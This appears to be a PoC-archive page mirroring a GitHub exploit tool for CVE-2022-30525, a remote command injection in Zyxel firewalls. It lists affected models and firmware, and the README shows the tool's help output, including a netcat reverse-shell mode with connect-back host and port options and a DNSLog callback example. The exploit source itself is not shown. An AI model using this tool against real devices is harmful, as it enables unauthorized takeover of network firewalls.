Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2022-30525 PoC — 合勤科技 USG FLEX 操作系统命令注入漏洞

Source
https://github.com/k0sf/CVE-2022-30525
Associated Vulnerability
Title:合勤科技 USG FLEX 操作系统命令注入漏洞 (CVE-2022-30525)
Description:A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
Description
CVE-2022-30525(Zxyel 防火墙命令注入)的概念证明漏洞利用
Readme
# CVE-2022-30525

Zyxel 防火墙未经身份验证的远程命令注入漏洞

## 影响组件
USG FLEX 100, 100W, 200, 500, 700 USG20-VPN, USG20W-VPN ATP 100, 200, 500, 700, 800

## 固件版本
ZLD5.00 thru ZLD5.21 Patch 1 ZLD5.10 thru ZLD5.21 Patch 1 ZLD5.10 thru ZLD5.21 Patch 


## help

```shell
[root@localhost ~]# ./CVE-2022-30525 -h
NAME:
   CVE-2022-30525 - Zyxel Firewall Command Injection (CVE-2022-30525)

USAGE:
   CVE-2022-30525 [global options] command [command options] [arguments...]

COMMANDS:
   nc         use netcat listener
   dnslog, d  USE DNSLog
   help, h    Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --help, -h  show help (default: false)


[root@localhost ~]# ./CVE-2022-30525 nc -h
NAME:
   CVE-2022-30525 nc - use netcat listener

USAGE:
   CVE-2022-30525 nc [command options] [arguments...]

OPTIONS:
   --rhost value     The remote address to exploit
   --rport value     The remote port to exploit (default: 443)
   --lhost value     The local address to connect back to
   --lport value     The local port to connect back to (default: 1270)
   --protocol value  The protocol handler to use (default: https://)
   --ncpath value    The path to nc (default: /usr/bin/nc)
   --help, -h        show help (default: false)


[root@localhost ~]# ./CVE-2022-30525 dnslog "http://192.168.0.123"

```
File Snapshot

 [4.0K]  /data/pocs/362c9eec745bd775e124b1623026c6cab549b8da
├── [3.4K]  CVE-2022-30525.go
├── [4.0K]  dnslog
│   └── [ 758]  dnslog.go
├── [ 449]  go.mod
└── [1.3K]  README.md

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →